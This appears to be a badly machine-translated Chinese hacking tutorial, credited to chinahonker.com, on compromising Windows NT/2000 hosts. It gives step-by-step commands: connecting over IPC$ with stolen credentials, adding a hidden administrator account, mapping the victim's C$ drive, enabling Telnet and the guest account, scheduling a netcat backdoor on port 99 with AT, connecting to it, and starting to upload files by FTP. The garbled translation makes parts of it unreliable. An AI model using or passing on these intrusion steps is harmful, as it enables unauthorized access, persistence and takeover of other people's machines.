1: NET As long as you have an IP username and password, use IPC $ to connect! Here us if the user you get is HBX, the password is 123456. Suppose the other party IP is 127.0.0.1 Net Use //127.0.0.1/IPC $ 123456 / user: HBX Exit command is NET Use //127.0.0.1/IPC / DELTE The following Operation You must use it. Login The method is above. ---------------------- Here we tell how to create a user, because SA's permissions are equivalent to the system's superuser. We add one Heibai's user password for loveChina Net User Heibai LoveChina / Add as long as the command is displayed, then we can join him to the Administrator group. Net localgroup administrators Heibai / Add --------------- ----- Here is the C disk that is mapped to the other party. Of course, other discs can also, as long as there is, we will map the other party C disk to the local Z disk. Net use z: //127.0.0.1/c $ ---------------------- Net Start Telnet This can open the other party's Telnet service. ---------------- ------ Here is to activate the guest, Guest is the default user of NT, and cannot be deleted? I don't know if I am, my 2000 is deleted. NET User Guest / Active: YES ---------------------- Here is to change the password of a user, we change the password of the guest to LoveChina, other users That's also fine. As long as there is permission! Net user guest lovechina net command is really powerful! 2: AT generally leaves the back door after the invader invaded, that is, the Trojan, you pass the Trojan, how to start him? Then you need AT commands, here you have already logged in that server. You first have to get the other party, Net Time //127.0.0.1 will return a time, here the time is 12: 1, now you need to create a job, ID = 1 AT //127.0.0.1 12: 3 NC. EXE is assumed to have a Trojan, named nc.exe, this thing is on the other party server. Here you introduce NC, NC is Netcat, for convenient input, it will generally be renamed. It is a Telnet service, port is 99 . Wait until 12: 3, you can connect to the 99 port of the other party. This gives the other party to the Trojan. 3: Telnet This command is very practical, it can be connected to the distance, but you need passwords, users, but you give The other party planted Trojans, directly connected to the port of this Trojan. Telnet 127.0.0.1 99 This can be connected to the 99 port of the other party. Then you can run the command in the other party, this is the broiler. 4: ftp it can Your things are transmitted to the other party, you can apply for a space that supports FTP uploads, how many domestic is, if you can't find it, I will give a www.51.net, not bad. When we applied, It gives the user name, password, and FTP server. Need to log in before the upload, here we assume that the FTP server is www.51.net, the username is hucjs, the password is 654321 FTP
http://www.51.net
He will ask the user to enter the password after successful.
This article is selected from www.chinahonker.com